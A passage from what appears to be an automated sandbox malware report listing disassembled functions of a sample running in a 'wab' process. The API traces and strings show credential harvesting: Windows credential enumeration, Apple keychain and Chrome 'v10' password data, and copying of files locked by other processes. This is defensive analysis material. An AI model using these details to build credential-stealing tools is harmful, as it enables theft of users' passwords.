                    • CloseHandle.KERNEL32(C0000004,?,?,?,?,000000FF,00000000,00000104), ref: 0040DF92
                    • _wcsicmp.MSVCRT ref: 0040DFB2
                    • CloseHandle.KERNEL32(00000104,?,000000FF,00000000,00000104), ref: 0040DFF2
                    Strings
                    Memory Dump Source
                    • Source File: 0000000A.00000002.2348223895.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_10_2_400000_wab.jbxd
                    Similarity
                    • API ID: AddressProc$Handle_wcsicmp$CloseProcess$CurrentFileModulememset$??2@ChangeCreateDuplicateFindInformationNameNotificationOpenQuerySystem
                    • String ID: dllhost.exe$taskhost.exe$taskhostex.exe
                    • API String ID: 594330280-3398334509
                    • Opcode ID: c0cdbd66bb0eb3cac082432fda8d0328b9155cc6ebf5e989b7bcc70ed293d7d6
                    • Instruction ID: 75e999e9478e2cd8c236028a88c267773407d5e0538ee9298daa3020847ac7a6
                    • Opcode Fuzzy Hash: c0cdbd66bb0eb3cac082432fda8d0328b9155cc6ebf5e989b7bcc70ed293d7d6
                    • Instruction Fuzzy Hash: 57818F71D00209AFEB10EF95CC81AAEBBB5FF04345F20407AF915B6291DB399E95CB58
                    Function 00413D4C Relevance: 22.9, APIs: 11, Strings: 2, Instructions: 142processlibraryloaderCOMMON
                    Download Yara Rule

                    Control-flow Graph

                    • Executed
                    • Not Executed
                    control_flow_graph 635 413d4c-413da0 call 40b633 CreateToolhelp32Snapshot memset Process32FirstW 638 413f00-413f11 Process32NextW 635->638 639 413da5-413ded OpenProcess 638->639 640 413f17-413f24 CloseHandle 638->640 641 413eb0-413eb5 639->641 642 413df3-413e26 memset call 413f27 639->642 641->638 643 413eb7-413ebd 641->643 650 413e79-413e9d call 413959 call 413ca4 642->650 651 413e28-413e35 642->651 645 413ec8-413eda call 4099f4 643->645 646 413ebf-413ec6 ??3@YAXPAX@Z 643->646 648 413edb-413ee2 645->648 646->648 652 413ee4 648->652 653 413ee7-413efe 648->653 662 413ea2-413eae CloseHandle 650->662 656 413e61-413e68 651->656 657 413e37-413e44 GetModuleHandleW 651->657 652->653 653->638 656->650 659 413e6a-413e76 656->659 657->656 658 413e46-413e5c GetProcAddress 657->658 658->656 659->650 662->641
                    APIs
                      • Part of subcall function 0040B633: ??3@YAXPAX@Z.MSVCRT ref: 0040B63A
                    • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 00413D6A
                    • memset.MSVCRT ref: 00413D7F
                    • Process32FirstW.KERNEL32(00000000,?), ref: 00413D9B
                    • OpenProcess.KERNEL32(00000410,00000000,?,?,?,?), ref: 00413DE0
                    • memset.MSVCRT ref: 00413E07
                    • GetModuleHandleW.KERNEL32(kernel32.dll,00000000,?), ref: 00413E3C
                    • GetProcAddress.KERNEL32(00000000,QueryFullProcessImageNameW), ref: 00413E56
                    • CloseHandle.KERNEL32(?,?,?,?,00000000,?), ref: 00413EA8
                    • ??3@YAXPAX@Z.MSVCRT ref: 00413EC1
                    • Process32NextW.KERNEL32(00000000,0000022C), ref: 00413F0A
                    • CloseHandle.KERNEL32(00000000,00000000,0000022C), ref: 00413F1A
                    Strings
                    Memory Dump Source
                    • Source File: 0000000A.00000002.2348223895.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_10_2_400000_wab.jbxd
                    Similarity
                    • API ID: Handle$??3@CloseProcess32memset$AddressCreateFirstModuleNextOpenProcProcessSnapshotToolhelp32
                    • String ID: QueryFullProcessImageNameW$kernel32.dll
                    • API String ID: 912665193-1740548384
                    • Opcode ID: d01459b62e4562fe598c3dda65fe2a12e31c3c57d7bea03f0a3dc75513a8eb61
                    • Instruction ID: a891ebf292d3308fa7e32b9fbc5d589fb36fb38cf1b6cbdc37d41f3709903cdc
                    • Opcode Fuzzy Hash: d01459b62e4562fe598c3dda65fe2a12e31c3c57d7bea03f0a3dc75513a8eb61
                    • Instruction Fuzzy Hash: B4518FB2C00218ABDB10DF5ACC84ADEF7B9AF95305F1041ABE509A3251D7795F84CFA9
                    Function 0040B58D Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 60COMMON
                    Download Yara Rule
                    APIs
                    • GetModuleHandleW.KERNEL32(00000000,00000000,?,?), ref: 0040B5A5
                    • FindResourceW.KERNELBASE(00000000,00000032,BIN), ref: 0040B5B6
                    • LoadResource.KERNEL32(00000000,00000000), ref: 0040B5C4
                    • SizeofResource.KERNEL32(?,00000000), ref: 0040B5D4
                    • LockResource.KERNEL32(00000000), ref: 0040B5DD
                    • memcpy.MSVCRT ref: 0040B60D
                    Strings
                    Memory Dump Source
                    • Source File: 0000000A.00000002.2348223895.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_10_2_400000_wab.jbxd
                    Similarity
                    • API ID: Resource$FindHandleLoadLockModuleSizeofmemcpy
                    • String ID: BIN
                    • API String ID: 1668488027-1015027815
                    • Opcode ID: 6cadd12acd146c90b5568bc01b4485451bf9b169e768bef5838699a2d497f07b
                    • Instruction ID: e905eb6dc449d61379ecdc49350c1a2f8866219970738eecada31b95dd052af9
                    • Opcode Fuzzy Hash: 6cadd12acd146c90b5568bc01b4485451bf9b169e768bef5838699a2d497f07b
                    • Instruction Fuzzy Hash: 5E11C636C00225BBD7116BE2DC09AAFBA78FF85755F010476F81072292DB794D018BED
                    Function 00418758 Relevance: 4.6, APIs: 3, Instructions: 79COMMON
                    Download Yara Rule
                    APIs
                      • Part of subcall function 00418680: GetFullPathNameW.KERNEL32(00000000,00000000,00000000,00000000,00000000,?,00000000,00000000,?,00000000), ref: 004186AC
                      • Part of subcall function 00418680: malloc.MSVCRT ref: 004186B7
                      • Part of subcall function 00418680: ??3@YAXPAX@Z.MSVCRT ref: 004186C7
                      • Part of subcall function 0041739B: GetVersionExW.KERNEL32(?), ref: 004173BE
                    • GetDiskFreeSpaceW.KERNELBASE(00000000,?,00000200,?,?,?,00000000,?,00000000), ref: 004187D2
                    • GetDiskFreeSpaceA.KERNEL32(00000000,?,00000200,?,?,?,00000000,?,00000000), ref: 004187FA
                    • ??3@YAXPAX@Z.MSVCRT ref: 00418803
                    Memory Dump Source
                    • Source File: 0000000A.00000002.2348223895.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_10_2_400000_wab.jbxd
                    Similarity
                    • API ID: ??3@DiskFreeSpace$FullNamePathVersionmalloc
                    • String ID:
                    • API String ID: 2947809556-0
                    • Opcode ID: 7494654f5416982ac8b8eb6095e1b911d56786f256e13b4958c27deb7a97d588
                    • Instruction ID: 9f5aa8738ec5ca8fa6c7af21032fcab0d24b7c3e7281463e4f88d86f77cdc7da
                    • Opcode Fuzzy Hash: 7494654f5416982ac8b8eb6095e1b911d56786f256e13b4958c27deb7a97d588
                    • Instruction Fuzzy Hash: 2A218776904118AEEB11EBA4CC849EF77BCEF05704F2404AFE551D7181EB784EC58769
                    Function 0040AE51 Relevance: 3.0, APIs: 2, Instructions: 39fileCOMMON
                    Download Yara Rule
                    APIs
                    • FindFirstFileW.KERNELBASE(?,?,?,00000000,00445F58,*.*,?,00000000,?,00000104,?,?,?,?,?,00000104), ref: 0040AE67
                    • FindNextFileW.KERNELBASE(?,?,?,00000000,00445F58,*.*,?,00000000,?,00000104,?,?,?,?,?,00000104), ref: 0040AE83
                    Memory Dump Source
                    • Source File: 0000000A.00000002.2348223895.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_10_2_400000_wab.jbxd
                    Similarity
                    • API ID: FileFind$FirstNext
                    • String ID:
                    • API String ID: 1690352074-0
                    • Opcode ID: 561b3503b5d493cb0f99635c99673ff26dffc0bbfdea02a94e907e6f5a7ee62d
                    • Instruction ID: bc213c2af839868520f9a45b85e911a0cf9bcc257b6b56acf9ba21b23a9e6198
                    • Opcode Fuzzy Hash: 561b3503b5d493cb0f99635c99673ff26dffc0bbfdea02a94e907e6f5a7ee62d
                    • Instruction Fuzzy Hash: 34F0C877040B005BD761C774D8489C733D89F84320B20063EF56AD32C0EB3899098755
                    Function 00418981 Relevance: 3.0, APIs: 2, Instructions: 28COMMON
                    Download Yara Rule
                    APIs
                    • memset.MSVCRT ref: 0041898C
                    • GetSystemInfo.KERNELBASE(004725C0,?,00000000,004439D6,?,00445FAE,?,?,?,?,?,?), ref: 00418995
                    Memory Dump Source
                    • Source File: 0000000A.00000002.2348223895.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_10_2_400000_wab.jbxd
                    Similarity
                    • API ID: InfoSystemmemset
                    • String ID:
                    • API String ID: 3558857096-0
                    • Opcode ID: d0407614e71e7ae135e22cefa727abc0102cb379ef2ade91b8070469c4ed11d1
                    • Instruction ID: bf8bfd662ffca2911032058da6995c9eeb4a28626cb6ee34ade21af96d3a2c90
                    • Opcode Fuzzy Hash: d0407614e71e7ae135e22cefa727abc0102cb379ef2ade91b8070469c4ed11d1
                    • Instruction Fuzzy Hash: C0E06531A0163097F22077766C067DF25949F41395F04407BB9049A186EBAC4D8546DE
                    Function 0044553B Relevance: 44.5, APIs: 23, Strings: 2, Instructions: 758COMMON
                    Download Yara Rule

                    Control-flow Graph

                    • Executed
                    • Not Executed
                    control_flow_graph 0 44553b-445558 call 44db70 3 445599-4455a2 0->3 4 44555a-44557c call 40c768 call 40bdb0 call 4135f7 0->4 5 4455a8-4455e3 memset call 403988 wcsrchr 3->5 6 4457fb 3->6 43 44558e-445594 call 444b06 4->43 44 44557e-44558c call 4136c0 call 41366b 4->44 15 4455e5 5->15 16 4455e8-4455f9 5->16 10 445800-445809 6->10 13 445856-44585f 10->13 14 44580b-44581e call 40a889 call 403e2d 10->14 18 445861-445874 call 40a889 call 403c9c 13->18 19 4458ac-4458b5 13->19 46 445823-445826 14->46 15->16 21 445672-445683 call 40a889 call 403fbe 16->21 22 4455fb-445601 16->22 58 445879-44587c 18->58 23 44594f-445958 19->23 24 4458bb-44592b memset * 2 call 414c2e call 40b2cc call 409d1f call 409b98 19->24 77 445685 21->77 78 4456b2-4456b5 call 40b1ab 21->78 30 445605-445607 22->30 31 445603 22->31 28 4459f2-4459fa 23->28 29 44595e-4459ce memset * 2 call 414c2e call 40b2cc call 409d1f call 409b98 23->29 140 44592d-445945 call 40b6ef 24->140 141 44594a 24->141 38 445a00-445aa1 memset * 2 call 414c2e call 40b2cc call 409d1f call 40b2cc call 40ae18 28->38 39 445b29-445b32 28->39 145 4459d0-4459e8 call 40b6ef 29->145 146 4459ed 29->146 30->21 42 445609-44560d 30->42 31->30 182 445b08-445b15 call 40ae51 38->182 47 445c7c-445c85 39->47 48 445b38-445b96 memset * 3 39->48 42->21 56 44560f-445641 call 4087b3 call 40a889 call 4454bf 42->56 43->3 44->43 49 44584c-445854 call 40b1ab 46->49 50 445828 46->50 70 445d1c-445d25 47->70 71 445c8b-445cf3 memset * 2 call 414c2e call 409d1f call 409b98 47->71 63 445bd4-445c72 call 414c2e call 40b2cc call 409d1f call 445389 call 40b2cc call 409d1f call 445389 call 40b2cc call 409d1f call 445389 48->63 64 445b98-445ba0 48->64 49->13 65 44582e-445847 call 40a9b5 call 4087b3 50->65 156 445665-445670 call 40b1ab 56->156 157 445643-445663 call 40a9b5 call 4087b3 56->157 61 4458a2-4458aa call 40b1ab 58->61 62 44587e 58->62 61->19 75 445884-44589d call 40a9b5 call 4087b3 62->75 249 445c77 63->249 64->63 76 445ba2-445bcf call 4099c6 call 445403 call 445389 64->76 143 445849 65->143 82 445fae-445fb2 70->82 83 445d2b-445d3b 70->83 160 445cf5 71->160 161 445cfc-445d03 71->161 148 44589f 75->148 76->47 93 44568b-4456a4 call 40a9b5 call 4087b3 77->93 109 4456ba-4456c4 78->109 98 445d3d-445d65 call 409c52 call 40b2cc _wcsicmp 83->98 99 445d88-445e15 memset * 3 call 414c2e call 40b2cc call 409d1f call 409b98 83->99 150 4456a9-4456b0 93->150 166 445d67-445d6c 98->166 167 445d71-445d83 call 445093 98->167 196 445e17 99->196 197 445e1e-445e25 99->197 122 4457f9 109->122 123 4456ca-4456d3 call 413cfa call 413d4c 109->123 122->6 174 4456d8-4456f7 call 40b2cc call 413fa6 123->174 140->141 141->23 143->49 145->146 146->28 148->61 150->78 150->93 156->109 157->156 160->161 171 445d05-445d13 161->171 172 445d17 161->172 176 445fa1-445fa9 call 40b6ef 166->176 167->82 171->172 172->70 207 4456fd-445796 memset * 4 call 409c70 * 3 174->207 208 4457ea-4457f7 call 413d29 174->208 176->82 202 445b17-445b27 call 40aebe 182->202 203 445aa3-445ab0 call 40add4 182->203 196->197 198 445e27-445e59 call 40b2cc call 409d1f call 409b98 197->198 199 445e6b-445e7e call 445093 197->199 239 445e62-445e69 198->239 240 445e5b 198->240 220 445f67-445f99 call 40b2cc call 409d1f call 409b98 199->220 202->39 203->182 221 445ab2-445b03 memset call 40b2cc call 409d1f call 445389 203->221 207->208 248 445798-4457ca call 40b2cc call 409d1f call 409b98 207->248 208->10 220->82 253 445f9b 220->253 221->182 239->199 245 445e83-445ef5 memset call 40b2cc call 409d1f call 40ae18 239->245 240->239 265 445f4d-445f5a call 40ae51 245->265 248->208 264 4457cc-4457e5 call 4087b3 248->264 249->47 253->176 264->208 269 445ef7-445f04 call 40add4 265->269 270 445f5c-445f62 call 40aebe 265->270 269->265 274 445f06-445f38 call 40b2cc call 409d1f call 409b98 269->274 270->220 274->265 281 445f3a-445f48 call 445093 274->281 281->265
                    APIs
                    • memset.MSVCRT ref: 004455C2
                    • wcsrchr.MSVCRT ref: 004455DA
                    • memset.MSVCRT ref: 0044570D
                    • memset.MSVCRT ref: 00445725
                      • Part of subcall function 0040C768: _wcslwr.MSVCRT ref: 0040C817
                      • Part of subcall function 0040C768: wcslen.MSVCRT ref: 0040C82C
                      • Part of subcall function 0040BDB0: CredEnumerateW.ADVAPI32(00000000,00000000,?,?,?,00000000,?), ref: 0040BDE9
                      • Part of subcall function 0040BDB0: wcslen.MSVCRT ref: 0040BE06
                      • Part of subcall function 0040BDB0: _wcsncoll.MSVCRT ref: 0040BE38
                      • Part of subcall function 0040BDB0: memset.MSVCRT ref: 0040BE91
                      • Part of subcall function 0040BDB0: memcpy.MSVCRT ref: 0040BEB2
                      • Part of subcall function 004135F7: GetProcAddress.KERNEL32(?,00000000), ref: 0041362A
                    • memset.MSVCRT ref: 0044573D
                    • memset.MSVCRT ref: 00445755
                    • memset.MSVCRT ref: 004458CB
                    • memset.MSVCRT ref: 004458E3
                    • memset.MSVCRT ref: 0044596E
                    • memset.MSVCRT ref: 00445A10
                    • memset.MSVCRT ref: 00445A28
                    • memset.MSVCRT ref: 00445AC6
                      • Part of subcall function 00445093: GetFileSize.KERNEL32(00000000,00000000,?,00000000,00000104,00445E7E,?,?,?,?,00000104), ref: 004450AA
                      • Part of subcall function 00445093: ??2@YAPAXI@Z.MSVCRT ref: 004450BE
                      • Part of subcall function 00445093: memset.MSVCRT ref: 004450CD
                      • Part of subcall function 00445093: ??3@YAXPAX@Z.MSVCRT ref: 004450F0
                      • Part of subcall function 00445093: CloseHandle.KERNEL32(00000000,?,?,00000104), ref: 004450F7
                    • memset.MSVCRT ref: 00445B52
                    • memset.MSVCRT ref: 00445B6A
                    • memset.MSVCRT ref: 00445C9B
                    • memset.MSVCRT ref: 00445CB3
                    • _wcsicmp.MSVCRT ref: 00445D56
                    • memset.MSVCRT ref: 00445B82
                      • Part of subcall function 0040B6EF: memset.MSVCRT ref: 0040B71C
                      • Part of subcall function 0040B6EF: wcsrchr.MSVCRT ref: 0040B738
                      • Part of subcall function 0040B6EF: memset.MSVCRT ref: 0040B756
                      • Part of subcall function 0040B6EF: memset.MSVCRT ref: 0040B7F5
                      • Part of subcall function 0040B6EF: CreateFileW.KERNELBASE(00445FAE,80000000,00000000,00000000,00000003,00000000,00000000,?,?), ref: 0040B80C
                      • Part of subcall function 0040ADD4: wcscmp.MSVCRT ref: 0040ADF3
                      • Part of subcall function 0040ADD4: wcscmp.MSVCRT ref: 0040AE04
                    • memset.MSVCRT ref: 00445986
                      • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D29
                      • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D33
                      • Part of subcall function 00409D1F: wcscpy.MSVCRT ref: 00409D47
                      • Part of subcall function 00409D1F: wcscat.MSVCRT ref: 00409D55
                      • Part of subcall function 00409B98: GetFileAttributesW.KERNELBASE(?,00445E12,?,?,?,00000104), ref: 00409B9C
                    Strings
                    Memory Dump Source
                    • Source File: 0000000A.00000002.2348223895.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_10_2_400000_wab.jbxd
                    Similarity
                    • API ID: memset$wcslen$File$wcscmpwcsrchr$??2@??3@AddressAttributesCloseCreateCredEnumerateHandleProcSize_wcsicmp_wcslwr_wcsncollmemcpywcscatwcscpy
                    • String ID: *.*$Apple Computer\Preferences\keychain.plist
                    • API String ID: 2745753283-3798722523
                    • Opcode ID: 60142fc224ce82f33f024026baff3817031bc91c0ca8ee6e0e9eeeaa230f4715
                    • Instruction ID: 0d822d17a5609fa1e1b699618fc72e24fb48bc28b5d87ede4d5502c71e25afa2
                    • Opcode Fuzzy Hash: 60142fc224ce82f33f024026baff3817031bc91c0ca8ee6e0e9eeeaa230f4715
                    • Instruction Fuzzy Hash: ED4278B29005196BEB10E761DD46EDFB37CEF45358F1001ABF508A2193EB385E948B9A
                    Function 0041276D Relevance: 33.4, APIs: 16, Strings: 3, Instructions: 149COMMON
                    Download Yara Rule

                    Control-flow Graph

                    APIs
                      • Part of subcall function 004044A4: LoadLibraryW.KERNEL32(comctl32.dll), ref: 004044C3
                      • Part of subcall function 004044A4: GetProcAddress.KERNEL32(00000000,InitCommonControlsEx), ref: 004044D5
                      • Part of subcall function 004044A4: FreeLibrary.KERNEL32(00000000), ref: 004044E9
                      • Part of subcall function 004044A4: MessageBoxW.USER32(00000001,Error: Cannot load the common control classes.,Error,00000030), ref: 00404514
                    • SetErrorMode.KERNELBASE(00008001), ref: 00412799
                    • GetModuleHandleW.KERNEL32(00000000,0041493C,00000000), ref: 004127B2
                    • EnumResourceTypesW.KERNEL32(00000000), ref: 004127B9
                    Strings
                    Memory Dump Source
                    • Source File: 0000000A.00000002.2348223895.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_10_2_400000_wab.jbxd
                    Similarity
                    • API ID: Library$AddressEnumErrorFreeHandleLoadMessageModeModuleProcResourceTypes
                    • String ID: $/deleteregkey$/savelangfile
                    • API String ID: 2744995895-28296030
                    • Opcode ID: 72338f9f39f0fed86814d702f01b1d2779e3084bd08ead6f54537fd18a2fe269
                    • Instruction ID: bb1d383b9f388563dc7403a66819e695bb2bbb53a4e653fbe84b6d7681309d95
                    • Opcode Fuzzy Hash: 72338f9f39f0fed86814d702f01b1d2779e3084bd08ead6f54537fd18a2fe269
                    • Instruction Fuzzy Hash: FC51BEB1608346ABD710AFA6DD88A9F77ECFF81304F40092EF644D2161D778E8558B2A
                    Function 0040B6EF Relevance: 30.1, APIs: 15, Strings: 2, Instructions: 388fileCOMMON
                    Download Yara Rule

                    Control-flow Graph

                    APIs
                    • memset.MSVCRT ref: 0040B71C
                      • Part of subcall function 00409C70: wcscpy.MSVCRT ref: 00409C75
                      • Part of subcall function 00409C70: wcsrchr.MSVCRT ref: 00409C7D
                    • wcsrchr.MSVCRT ref: 0040B738
                    • memset.MSVCRT ref: 0040B756
                    • memset.MSVCRT ref: 0040B7F5
                    • CreateFileW.KERNELBASE(00445FAE,80000000,00000000,00000000,00000003,00000000,00000000,?,?), ref: 0040B80C
                    • CopyFileW.KERNEL32(00445FAE,?,00000000,?,?), ref: 0040B82D
                    • FindCloseChangeNotification.KERNELBASE(00000000,?,?), ref: 0040B838
                    • memset.MSVCRT ref: 0040B851
                    • memset.MSVCRT ref: 0040B8CA
                    • memcmp.MSVCRT ref: 0040B9BF
                      • Part of subcall function 00404423: GetProcAddress.KERNEL32(?,00000000), ref: 00404453
                      • Part of subcall function 00404423: FreeLibrary.KERNEL32(00000000,00000141,?,00000000,?,004026E9,?,?,00000000,?), ref: 00404476
                    • DeleteFileW.KERNEL32(?,?,?,?,?,?,?,?,?,?), ref: 0040BAE5
                    • memset.MSVCRT ref: 0040BB53
                    • memcpy.MSVCRT ref: 0040BB66
                    • LocalFree.KERNEL32(00000000,?,?,?,00000000,00000000,?), ref: 0040BB8D
                    Strings
                    Memory Dump Source
                    • Source File: 0000000A.00000002.2348223895.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_10_2_400000_wab.jbxd
                    Similarity
                    • API ID: memset$File$Freewcsrchr$AddressChangeCloseCopyCreateDeleteFindLibraryLocalNotificationProcmemcmpmemcpywcscpy
                    • String ID: chp$v10
                    • API String ID: 170802307-2783969131
                    • Opcode ID: aa7ff03ddb8a60b54c19e14ecab6b10a2ad5bd81823861da0c4d13f19dc0bdfc
                    • Instruction ID: 8b5aa87907ec6e815121f1c024adfc7170cbdef62e19f7af032d1a0a82a34a86
                    • Opcode Fuzzy Hash: aa7ff03ddb8a60b54c19e14ecab6b10a2ad5bd81823861da0c4d13f19dc0bdfc
                    • Instruction Fuzzy Hash: 32D17372900218AFEB11EB95DC41EEE77B8EF44304F1044BAF509B7191DB789F858B99
                    Function 0040E2AB Relevance: 26.4, APIs: 7, Strings: 8, Instructions: 165COMMON
                    Download Yara Rule

                    Control-flow Graph

                    • Executed
                    • Not Executed
                    control_flow_graph 504 40e2ab-40e2ce call 40695d call 406b90 508 40e2d3-40e2d5 504->508 509 40e4a0-40e4af call 4069a3 508->509 510 40e2db-40e300 508->510 511 40e304-40e316 call 406e8f 510->511 516 40e476-40e483 call 406b53 511->516 517 40e31c-40e39b call 40dd50 * 7 memset call 40aa29 511->517 523 40e302 516->523 524 40e489-40e495 call 40aa04 516->524 541 40e3c9-40e3ce 517->541 542 40e39d-40e3ae call 40742e 517->542 523->511 524->509 530 40e497-40e49f ??3@YAXPAX@Z 524->530 530->509 544 40e3d0-40e3d6 541->544 545 40e3d9-40e3de 541->545 549 40e3b0 542->549 550 40e3b3-40e3c1 wcschr 542->550 544->545 547 40e3e0-40e3f1 memcpy 545->547 548 40e3f4-40e3f9 545->548 547->548 551 40e3fb-40e40c memcpy 548->551 552 40e40f-40e414 548->552 549->550 550->541 553 40e3c3-40e3c6 550->553 551->552 554 40e416-40e427 memcpy 552->554 555 40e42a-40e42f 552->555 553->541 554->555 556 40e431-40e442 memcpy 555->556 557 40e445-40e44a 555->557 556->557 558 40e44c-40e45b 557->558 559 40e45e-40e463 557->559 558->559 559->516 560 40e465-40e469 559->560 560->516 561 40e46b-40e473 560->561 561->516
                    APIs
                      • Part of subcall function 00406B90: _wcsicmp.MSVCRT ref: 00406BC1
                      • Part of subcall function 00406E8F: memset.MSVCRT ref: 00406F8B
                    • ??3@YAXPAX@Z.MSVCRT ref: 0040E49A
                      • Part of subcall function 0040DD50: _wcsicmp.MSVCRT ref: 0040DD69
                    • memset.MSVCRT ref: 0040E380
                      • Part of subcall function 0040AA29: wcslen.MSVCRT ref: 0040AA3C
                      • Part of subcall function 0040AA29: memcpy.MSVCRT ref: 0040AA5B
                    • wcschr.MSVCRT ref: 0040E3B8
                    • memcpy.MSVCRT ref: 0040E3EC
                    • memcpy.MSVCRT ref: 0040E407
                    • memcpy.MSVCRT ref: 0040E422
                    • memcpy.MSVCRT ref: 0040E43D
                    Strings
                    Memory Dump Source
                    • Source File: 0000000A.00000002.2348223895.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_10_2_400000_wab.jbxd
                    Similarity
                    • API ID: memcpy$_wcsicmpmemset$??3@wcschrwcslen
                    • String ID: $AccessCount$AccessedTime$CreationTime$EntryID$ExpiryTime$ModifiedTime$Url
                    • API String ID: 3073804840-2252543386
                    • Opcode ID: c30480054a5ca474dc40abe6212bc187cfeb1b733cbf080f7a891c76daa1d321
                    • Instruction ID: 3bb3cf654da2d90f893253d259683e8481abe175d229eeda5eb464894a91a1db
                    • Opcode Fuzzy Hash: c30480054a5ca474dc40abe6212bc187cfeb1b733cbf080f7a891c76daa1d321
                    • Instruction Fuzzy Hash: DA512071E00309ABDF10EFA6DC45B9EB7B8AF54305F15443BA904F7291E678AA14CB58
                    Function 004091B8 Relevance: 25.8, APIs: 16, Strings: 1, Instructions: 272COMMON
                    Download Yara Rule

                    Control-flow Graph

                    • Executed
                    • Not Executed
                    control_flow_graph 562 4091b8-40921b memset call 40a6e6 call 444432 567 409520-409526 562->567 568 409221-40923b call 40b273 call 438552 562->568 572 409240-409248 568->572 573 409383-4093ab call 40b273 call 438552 572->573 574 40924e-409258 call 4251c4 572->574 586 4093b1 573->586 587 4094ff-40950b call 443d90 573->587 579 40937b-40937e call 424f26 574->579 580 40925e-409291 call 4253cf * 2 call 4253af * 2 574->580 579->573 580->579 610 409297-409299 580->610 590 4093d3-4093dd call 4251c4 586->590 587->567 596 40950d-409511 587->596 597 4093b3-4093cc call 4253cf * 2 590->597 598 4093df 590->598 596->567 600 409513-40951d call 408f2f 596->600 597->590 613 4093ce-4093d1 597->613 601 4094f7-4094fa call 424f26 598->601 600->567 601->587 610->579 612 40929f-4092a3 610->612 612->579 614 4092a9-4092ba 612->614 613->590 615 4093e4-4093fb call 4253af * 2 613->615 616 4092bc 614->616 617 4092be-4092e3 memcpy memcmp 614->617 615->601 627 409401-409403 615->627 616->617 618 409333-409345 memcmp 617->618 619 4092e5-4092ec 617->619 618->579 622 409347-40935f memcpy 618->622 619->579 621 4092f2-409331 memcpy * 2 619->621 624 409363-409378 memcpy 621->624 622->624 624->579 627->601 628 409409-40941b memcmp 627->628 628->601 629 409421-409433 memcmp 628->629 630 4094a4-4094b6 memcmp 629->630 631 409435-40943c 629->631 630->601 633 4094b8-4094ed memcpy * 2 630->633 631->601 632 409442-4094a2 memcpy * 3 631->632 634 4094f4 632->634 633->634 634->601
                    APIs
                    Strings
                    Memory Dump Source
                    • Source File: 0000000A.00000002.2348223895.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_10_2_400000_wab.jbxd
                    Similarity
                    • API ID: memcpy$memcmp$ByteCharMultiWidememset
                    • String ID:
                    • API String ID: 3715365532-3916222277
                    • Opcode ID: 84d8fa7e2563b014b86416b64341180d82413736d9254b8658418cb4f91a0b1c
                    • Instruction ID: d5c0d9b4f94ac501fd0f2fb5594fd033b2d13f4c98b4255323c8c53c7695c3f7
                    • Opcode Fuzzy Hash: 84d8fa7e2563b014b86416b64341180d82413736d9254b8658418cb4f91a0b1c
                    • Instruction Fuzzy Hash: DDA1BA71900605ABDB21EF65D885BAFB7BCAF44304F01043FF945E6282EB78EA458B59
                    Function 0040E01E Relevance: 22.9, APIs: 12, Strings: 1, Instructions: 120fileCOMMON
                    Download Yara Rule

                    Control-flow Graph

                    APIs
                      • Part of subcall function 0040DD85: memset.MSVCRT ref: 0040DDAD
                      • Part of subcall function 0040DD85: CreateFileW.KERNELBASE(?,80000000,00000003,00000000,00000003,00000000,00000000,?,000000FF,00000000,00000104), ref: 0040DDD4
                      • Part of subcall function 0040DD85: NtQuerySystemInformation.NTDLL(00000010,00000104,00001000,00000000,?,000000FF,00000000,00000104), ref: 0040DE15
                      • Part of subcall function 0040DD85: FindCloseChangeNotification.KERNELBASE(C0000004,?,000000FF,00000000,00000104), ref: 0040DE3E
                      • Part of subcall function 0040DD85: GetCurrentProcessId.KERNEL32(?,000000FF,00000000,00000104), ref: 0040DE49
                      • Part of subcall function 0040DD85: _wcsicmp.MSVCRT ref: 0040DEB2
                      • Part of subcall function 0040AFCF: ??2@YAPAXI@Z.MSVCRT ref: 0040AFD8
                    • OpenProcess.KERNEL32(00000040,00000000,00000000,00000104,?,00000000,00000104,?,00000000,00000104,00000000), ref: 0040E093
                    • GetCurrentProcess.KERNEL32(?,80000000,00000000,00000000), ref: 0040E0B2
                    • DuplicateHandle.KERNELBASE(?,00000104,00000000), ref: 0040E0BF
                    • GetFileSize.KERNEL32(?,00000000), ref: 0040E0D4
                      • Part of subcall function 00409A45: GetTempPathW.KERNEL32(00000104,?,00445FAE), ref: 00409A5C
                      • Part of subcall function 00409A45: GetWindowsDirectoryW.KERNEL32(?,00000104), ref: 00409A6E
                      • Part of subcall function 00409A45: GetTempFileNameW.KERNELBASE(?,0040B827,00000000,?), ref: 00409A85
                      • Part of subcall function 004096DC: CreateFileW.KERNELBASE(00000001,40000000,00000001,00000000,00000002,00000000,00000000,0040E0F1,00000104), ref: 004096EE
                    • CreateFileMappingW.KERNELBASE(?,00000000,00000002,00000000,00000000,00000000), ref: 0040E0FE
                    • MapViewOfFile.KERNELBASE(00000000,00000004,00000000,00000000,00000104), ref: 0040E113
                    • WriteFile.KERNELBASE(00000000,00000000,00000104,0040E6A3,00000000), ref: 0040E12E
